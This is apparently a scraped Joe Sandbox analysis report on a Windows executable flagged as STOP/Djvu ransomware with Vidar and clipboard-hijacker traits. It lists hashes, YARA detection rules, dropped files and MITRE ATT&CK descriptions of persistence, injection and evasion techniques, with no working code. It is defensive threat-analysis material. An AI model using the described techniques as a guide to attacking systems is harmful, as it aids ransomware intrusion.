Start time:	00:22:35
Start date:	30/11/2022
Path:	C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Imagebase:	0x400000
File size:	680448 bytes
MD5 hash:	41001FDD7879CE9EDE214E92C7E492BE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000000.363751420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report U59WtZz2Sg.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Clipboard Hijacker

Threatname: Djvu

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\15593502492893213849595709

C:\ProgramData\28325875654976084354326271

C:\ProgramData\28516965580031020035471649

C:\ProgramData\50023325401737157063598945

C:\ProgramData\53195122028892118046415569

C:\ProgramData\69859612379489584907088796

C:\SystemID\PersonalID.txt

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

Windows Analysis Report
U59WtZz2Sg.exe

Target ID:	18
Start time:	00:22:36
Start date:	30/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Target ID:	23
Start time:	00:23:58
Start date:	30/11/2022
Path:	C:\Windows\System32\wbem\WMIADAP.exe
Wow64 process (32bit):	false
Commandline:	wmiadap.exe /F /T /R
Imagebase:	0x7ff715590000
File size:	177664 bytes
MD5 hash:	9783D0765F31980950445DFD40DB15DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Services
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre